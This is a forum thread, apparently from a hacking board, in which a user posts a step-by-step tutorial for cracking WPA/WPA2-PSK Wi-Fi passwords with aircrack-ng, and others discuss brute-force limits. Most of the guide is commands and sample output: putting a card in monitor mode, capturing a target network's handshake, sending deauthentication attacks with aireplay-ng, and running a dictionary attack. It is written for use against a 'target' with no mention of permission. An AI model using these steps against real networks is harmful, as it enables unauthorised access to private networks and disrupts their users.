WPA CRACKING

[riley2458]

How To Crack Wireless Networks WPA psk/psk2

Requirements

Linux OS ( almost any will work )
Aircrack-Ng Suite
Madwifi Driver ** search on google **
A Good Dictionary file

** If using backtrack or another live cd these things are probably already built in


STARTING:

Alright before doing any of this make sure your network card is compatible with aircrack & madwifi! Some cards dont wake up after you put them in monitor mode.
Ok login as root and goto a terminal.

Code: Select all

[root@localhost ~]# airmon-ng


Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng
ath0      Atheros      madwifi-ng VAP (parent: wifi0)

Now just put your card in monitor mode

Code: Select all

[root@localhost ~]# airmon-ng stop ath0


Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng
ath0      Atheros      madwifi-ng VAP (parent: wifi0)

[root@localhost ~]# airmon-ng start wifi0


Interface   Chipset      Driver

wifi0      Atheros      madwifi-ng
ath0      Atheros      madwifi-ng VAP (monitor mode enabled)

now just
type: ifconfig ath0 up
type: iwconfig

Code: Select all

[root@localhost ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.

pan0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.437 GHz  Access Point: **:**:**:**:**:**
          Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=1/1 
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/70  Signal level=-93 dBm  Noise level=-93 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

CAPTURING:

ok now you have to start capturing your targets network so first open a new terminal window.

Code: Select all

airodump-ng ath0

This shows all the networks you can capture in your area. Find the network you want to crack that is wpa protected, and copy the bssid ( mac address )

**DIRECTIONS**

airodump-ng:

-c channel that your target is on
example: airodump-ng -c 6

-w The name you want to save the capture as
example: airodump-ng -c 6 -w wpapsk
example2: /root/wpapsk-01.cap

--bssid The bssid that you want to capture ( the one you copied )
example: airodump-ng -c 6 -w wpapsk --bssid **:**:**:**:**:**

ath0 the interface you are using
example: airodump-ng -c 6 -w wpapsk --bssid **:**:**:**:**:** ath0

**END OF DIRECTIONS**

Alright now type: airodump-ng -c XX -w whateveruwant --bssid **:**:**:**:**:** ath0

Code: Select all

CH  6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51     

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

**:**:**:**:**:**   12 100     2495        7    0   6  54  WPA  TKIP   PSK   BOBNET

BSSID              STATION            PWR   Rate  Lost  Packets  Probes 

NOW WAIT untill a client connects to the network.

AIREPLAY:

Next your going to use aireplay to send attacks.

**DIRECTIONS**

aireplay-ng

xx= mine
**=targets

-0 5 This sends 5 attacks to the target
example: aireplay-ng -0 5

-a the target wireless networks bssid
example: aireplay-ng -0 5 -a **:**:**:**:**:**

-c your access point bssid ( remember iwconfig that i told you to leave open )
example: aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx

ath0 The interface and your ready to go!
example:

Code: Select all

aireplay-ng -0 5 -a **:**:**:**:**:** -c xx:xx:xx:xx:xx:xx ath0

** END OF DIRECTIONS **

CRACKING:

when your airodump finally shows this:

CH 6 ][ Elapsed: 2 mins ][ 2008-11-23 3:51 [WPA HANDSHAKE FOUND]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

**:**:**:**:**:** 12 100 2495 7 0 6 54 WPA TKIP PSK ************

BSSID STATION PWR Rate Lost Packets Probes

Then you can now crack there network!

FIRST YOU NEED A DICTIONARY FILE
make sure you know the directory its in.

**DIRECTIONS**

aircrack-ng

[the directory not a command]
example: aircrack-ng /root/w.ethenamewas-01.cap

-w The dictionary file ( the whole directory ) and then run the command!!

Code: Select all

[root@localhost ~]#aircrack-ng /root/w.ethenamewas-01.cap -w /usr/share/dict/linux.words

**END OF DIRECTIONS**

Once you run the command It should start cracking...

Code: Select all

  Aircrack-ng 1.0 rc1


                   [00:00:02] 622 keys tested (303.68 k/s)


                       Current passphrase: abscision                 


      Master Key     : 38 1A FF 6F C1 D1 B5 EE D5 73 FC A7 48 54 4E 1E
                       2E A8 A1 55 BD E2 2E 36 63 49 C0 96 DF CA 7E 5A

      Transcient Key : 6F A6 0D 93 46 F9 A2 6B AB 31 96 31 F9 C6 5F 51
                       83 91 86 59 30 A0 DB 95 43 5F D4 72 BA 5D BD B1
                       51 98 06 9B 7D E8 DD 4D AA 37 B3 E6 1F DF 1F 50
                       71 35 B9 2F 33 6F 89 1B E2 13 89 74 E5 E6 16 17

      EAPOL HMAC     : 68 B3 E9 AB 56 01 6C D8 A6 BE 4D B6 C2 0C 9D D0

THIS WILL ONLY WORK IF THE PASSWORD IS SOMEWHERE IN YOUR DICTIONARY!!



**This concludes my guide to crack wireless networks!!

Any problems just PM or comment.

[AgentSmithers]

Yeah I got these steps in my head, I use the AWUS036H Network adapter with Backtrack... What about Tkip is the only Public Method known is Bruteforce?? Or am I wrong?


Scrach that let me specify more. WEP we can do packet Injection then Bruteforce I don't believe there is such a Method for Packet injection for WPA, Just putting your card into Monitor mode then a Dictionary attack... Right?

[noOneSpecial]

as far as I know , you can only attack WPa via brute-force dictionary attack you could try john the ripper when he is in the --incremental mode and pipe it to the aircrack... but there is a problem that john can generate only words of upto 8 characters... and as we know WPA passphrase startes from 8 digits... So it would be nice for john to allow more then 8 digits in the incremental mode....